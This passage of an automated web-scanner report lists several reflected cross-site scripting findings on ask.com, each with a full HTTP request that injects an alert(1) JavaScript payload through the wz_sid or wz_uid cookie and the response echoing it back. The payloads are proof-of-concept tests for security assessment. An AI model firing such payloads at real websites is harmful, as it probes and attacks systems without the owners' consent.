Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F37e2e6'-alert(1)-'e96646f8744; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:44:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:50 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:50 GMT; Path=/
Content-Length: 51789

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F37e2e6'-alert(1)-'e96646f8744;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-186016459?" width="1" height="1" frameborder="0">
...[SNIP]...

3.570. http://www.ask.com/settings [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/settings

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83044'-alert(1)-'2b6cf44eb13 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /settings HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F383044'-alert(1)-'2b6cf44eb13; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:48 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjQ4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:48 GMT; Path=/
Content-Length: 57042

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F383044'-alert(1)-'2b6cf44eb13;u3=0;u2=;ord=-1083254227?" width="1" height="1" frameborder="0">
...[SNIP]...

3.571. http://www.ask.com/settings [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/settings

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e5c2'-alert(1)-'7f3f2543be0 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /settings HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F34e5c2'-alert(1)-'7f3f2543be0; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:50 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:50 GMT; Path=/
Content-Length: 57041

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F34e5c2'-alert(1)-'7f3f2543be0;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-637432572?" width="1" height="1" frameborder="0">
...[SNIP]...

3.572. http://www.ask.com/video [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/video

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da9f8'-alert(1)-'a9cc9a3ec17 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /video HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3da9f8'-alert(1)-'a9cc9a3ec17; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:47:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:47:17 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ3OjE3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:17 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:17 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 93736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F3da9f8'-alert(1)-'a9cc9a3ec17;u4=;u3=;u2=0;ord=-1467992265?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog
...[SNIP]...

3.573. http://www.ask.com/videos [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/videos

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2f4f'-alert(1)-'2414e1b1a8c was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /videos HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3d2f4f'-alert(1)-'2414e1b1a8c; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:09 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:09 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:09 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 38501

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F3d2f4f'-alert(1)-'2414e1b1a8c;u3=0;u2=;ord=-501149116?" width="1" height="1" frameborder="0">
...[SNIP]...

3.574. http://www.ask.com/videos [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/videos

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6663'-alert(1)-'72888292672 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /videos HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3a6663'-alert(1)-'72888292672; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:10 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjEwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:10 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 38501

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3a6663'-alert(1)-'72888292672;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-515644036?" width="1" height="1" frameborder="0">
...[SNIP]...

3.575. http://www.ask.com/web [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 781d9'-alert(1)-'e82c3d1acd9 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /web?q=regulator+boat&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_sid=014DDB4118C033B329ACD8C41BD460F3781d9'-alert(1)-'e82c3d1acd9; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:35:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:35:12 GMT; Path=/
Set-Cookie: clc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:35:12 GMT; Path=/
Set-Cookie: ldst=sorg=5772|1296156912123; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:35:12 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:35:12 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjM1OjEyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:35:12 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:35:12 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:35:12 GMT; Path=/
Content-Length: 128076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F3781d9'-alert(1)-'e82c3d1acd9;u3=0;u2=;ord=-963694494?" width="1" height="1" frameborder="0">
...[SNIP]...

3.576. http://www.ask.com/web [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a31d'-alert(1)-'c55824a03bd was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /web HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F38a31d'-alert(1)-'c55824a03bd; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:13 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjEzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:13 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:13 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 93736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F38a31d'-alert(1)-'c55824a03bd;u4=;u3=;u2=0;ord=-1028427333?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog
...[SNIP]...

3.577. http://www.ask.com/web [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The value of the wz_uid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74fd0"><script>alert(1)</script>82d6116414b was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /web?qsrc=2990&o=0&l=dir&q=regulator+boat+north+carolina HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=regulator+boat&search=&qsrc=0&o=0&l=dir
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
